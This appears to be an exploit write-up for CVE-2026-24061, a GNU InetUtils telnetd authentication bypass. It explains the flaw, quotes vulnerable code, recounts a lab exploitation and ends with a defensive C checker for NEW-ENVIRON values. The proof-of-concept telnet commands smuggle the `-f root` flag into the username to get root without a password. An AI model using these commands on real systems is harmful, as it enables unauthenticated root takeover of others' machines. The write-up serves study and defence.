## https://sploitus.com/exploit?id=B3B894F1-1A4A-555E-A82C-623DC073C025
## CVE-2026-24061 : GNU InetUtils telnetd Authentication Bypass Vulnerability
`CVE-2026-24061` is a critical weakness in the telnetd service of GNU InetUtils.

- **CVE ID :** CVE-2026-24061
- **Severity :** Critical (CVSS 9.8)
- **Attack Vector :** Network
- **Authentication Required :** None
- **Impact :** Full system compromise (root access)

The vulnerability originates from improper handling of the `USER` environment variable during Telnet session setup. This value is forwarded directly into the argument list of `/usr/bin/login` **without any sanitization or validation. As a result, a remote attacker can manipulate this input to inject command-line options, effectively bypassing authentication and obtaining a root shell instantly.**
#### Vulnerable Code Snippet
The following snippet from `telnetd/utility_file.c` shows how user-supplied values were directly used without validation:
```c
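    /* Excerpt from a switch statement: each case returns a copy of a
       session value, with no validation of its contents. */
    case 'h':
      return xstrdup (remote_hostname);
    case 'l':
      return xstrdup (local_hostname);
    case 'L':
      return xstrdup (line);
    case 't':
      /* Part of the line name after the first '/', or the whole name. */
      q = strchr (line + 1, '/');
      if (q)
        q++;
      else
        q = line;
      return xstrdup (q);
    case 'T':
      return terminaltype ? xstrdup (terminaltype) : NULL;
    case 'u':
      return user_name ? xstrdup (user_name) : NULL;
    case 'U':
      /* USER can be set by the remote client and is returned as-is. */
      return getenv ("USER") ? xstrdup (getenv ("USER")) : xstrdup ("");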
```
**Issue :**
The user-controlled values *USER*, *terminaltype*, and *line* are used without validation and copied directly into internal structures.
Since these values can be influenced by a remote client via the Telnet protocol, **this creates a critical injection point**.
**Attack flow :**
- Connect to the target telnetd service
- Use the Telnet NEW_ENVIRON option to set: **USER= " -f root"**
- The server processes this value without validation
- The injected flag is interpreted, potentially leading to authentication bypass or privilege escalation
**Proof of Concept**
A minimal proof of concept demonstrates how to exploit the vulnerability:
```bash
USER='-f root' telnet -a
telnet -l -'f root' ip_addr
```
**This command injects a malicious USER value during the Telnet handshake, which can result in unauthorized root access on vulnerable systems**
### Practical lab :
I completed a lab involving `CVE-2026-24061`, where I exploited the vulnerability by using `telnet -l '-f root' 176.16.2.153` to inject malicious arguments and achieve authentication bypass, ultimately gaining root-level access on the target system.
**What happens internally :**
1 - **-l :** refers to the login name
2 - **'-f root' :** the value passed as the username (`-f`: no password check, skip authentication; `root`: target user)
3 - The vulnerable server does no sanitization
4 - It interprets `-f` as a flag instead of part of a username
This allowed me to inject malicious arguments, bypass authentication, and gain root-level access on the target system
**Technical Summary**
The flaw resides in how telnetd handles the NEW_ENVIRON Telnet option. It allows a client to define environment variables that are passed to the system's /usr/bin/login binary. Because telnetd fails to sanitize the USER variable, an attacker can inject the -f flag (force login), which tells the login utility to skip password verification and immediately grant a session for the specified user (typically root)
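
A defensive check for the NEW_ENVIRON path described above, as an added example (not code from GNU InetUtils or from the original write-up): it parses a NEW-ENVIRON subnegotiation payload using the RFC 1572 codes and rejects a `USER` value that `login` could read as an option or as extra arguments. The function names, buffer sizes and the rule set (no leading `-`, no whitespace or control bytes) are assumptions, and the payload is assumed to have its IAC bytes already un-doubled.

```c
#include <stdio.h>
#include <string.h>
/* RFC 1572 NEW-ENVIRON codes. */
enum { NE_IS = 0, NE_INFO = 2, NE_VAR = 0, NE_VALUE = 1, NE_ESC = 2, NE_USERVAR = 3 };
/* Returns 1 if login cannot read the value as an option or as extra arguments. */
int value_is_safe(const char *v, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if ((unsigned char)v[i] <= ' ' || v[i] == 0x7f) return 0; /* space, control */
    return n == 0 || v[0] != '-';            /* leading '-' would be an option */
}

/* Copy one name or value into out, honouring ESC; returns next index, 0 on error. */
static size_t read_token(const unsigned char *p, size_t len, size_t i,
                         char *out, size_t cap, size_t *n)
{
    *n = 0;
    while (i < len && (p[i] > NE_USERVAR || p[i] == NE_ESC)) {
        /* Dangling ESC at end of payload, or token larger than the buffer. */
        if ((p[i] == NE_ESC && ++i >= len) || *n + 1 >= cap) return 0;
        out[(*n)++] = (char)p[i++];
    }
    out[*n] = '\0';
    return i;
}

/* p: bytes between "IAC SB NEW-ENVIRON" and "IAC SE" (assumed already un-doubled).
   Returns 1 = USER absent or safe, 0 = unsafe USER, -1 = malformed payload. */
int check_new_environ(const unsigned char *p, size_t len)
{
    char name[64], val[256];
    size_t i = 1, nn, vn;
    if (len < 1 || (p[0] != NE_IS && p[0] != NE_INFO)) return -1;
    while (i < len) {
        if (p[i] != NE_VAR && p[i] != NE_USERVAR) return -1;
        if ((i = read_token(p, len, i + 1, name, sizeof name, &nn)) == 0) return -1;
        vn = 0;                              /* a variable may carry no VALUE */
        if (i < len && p[i] == NE_VALUE &&
            (i = read_token(p, len, i + 1, val, sizeof val, &vn)) == 0) return -1;
        if (strcmp(name, "USER") == 0 && !value_is_safe(val, vn)) return 0;
    }
    return 1;
}

int main(void)
{   /* Constructed payload: IS, VAR "USER", VALUE "-f root". */
    const unsigned char s[] = { 0, 0, 'U','S','E','R', 1, '-','f',' ','r','o','o','t' };
    printf("verdict: %d\n", check_new_environ(s, sizeof s));
    return 0;
}
```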